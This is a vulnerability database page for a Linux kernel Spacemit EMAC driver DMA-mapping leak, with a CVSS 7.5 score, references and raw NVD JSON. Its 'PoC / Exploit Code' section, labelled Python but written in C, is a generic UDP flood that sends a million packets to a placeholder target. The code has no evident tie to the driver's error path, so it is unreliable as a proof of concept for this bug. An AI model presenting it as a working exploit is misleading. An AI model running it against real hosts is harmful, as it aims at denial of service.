CVE-2026-43462

Description

In the Linux kernel, the following vulnerability has been resolved: net: spacemit: Fix error handling in emac_tx_mem_map() The DMA mappings were leaked on mapping error. Free them with the existing emac_free_tx_buf() function.

CVSS Details

CVSS Score

7.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

Linux Kernel (Spacemit EMAC driver versions prior to fix)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <arpa/inet.h>
#include <sys/socket.h>

// Conceptual PoC for CVE-2026-43462
// This code attempts to trigger the DMA mapping leak in the Spacemit driver
// by sending a large volume of packets to the target.

int main() {
    int sock;
    struct sockaddr_in server;
    char buffer[1024];
    
    // Create a UDP socket
    sock = socket(AF_INET, SOCK_DGRAM, 0);
    if (sock == -1) {
        perror("Could not create socket");
        return 1;
    }
    
    server.sin_family = AF_INET;
    server.sin_port = htons(80); // Target port
    server.sin_addr.s_addr = inet_addr("TARGET_IP_ADDRESS"); 
    
    // Fill buffer with random data
    memset(buffer, 'A', sizeof(buffer));

    printf("Starting attack to trigger DMA leak...\n");
    
    // Loop to send packets continuously
    // In a real scenario, specific packet sizes might be needed to trigger mapping failures
    for(int i = 0; i < 1000000; i++) {
        if (sendto(sock, buffer, sizeof(buffer), 0, (struct sockaddr *)&server, sizeof(server)) < 0) {
            perror("Send failed");
        }
        
        // Small delay to allow processing and prevent immediate socket errors,
        // focusing on triggering the resource leak over time.
        usleep(100);
    }
    
    close(sock);
    return 0;
}

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-43462
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-43462
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-43462/
[4] VulDB https://vuldb.com/cve/CVE-2026-43462
[5] https://git.kernel.org/stable/c/86292155bea578ebab0ca3b65d4d87ecd8a0e9ea
[6] https://git.kernel.org/stable/c/c34ebd7b24ea70be3c6fdb6936f79f593f37df60
[7] https://git.kernel.org/stable/c/edeaba385318f60ec1b32470da4d5eb800294d16

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-43462", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-05-08T15:16:59.080", "lastModified": "2026-05-11T08:16:15.363", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: spacemit: Fix error handling in emac_tx_mem_map()\n\nThe DMA mappings were leaked on mapping error. Free them with the\nexisting emac_free_tx_buf() function."}], "metrics": {"cvssMetricV31": [{"source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "references": [{"url": "https://git.kernel.org/stable/c/86292155bea578ebab0ca3b65d4d87ecd8a0e9ea", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/c34ebd7b24ea70be3c6fdb6936f79f593f37df60", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/edeaba385318f60ec1b32470da4d5eb800294d16", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}]}}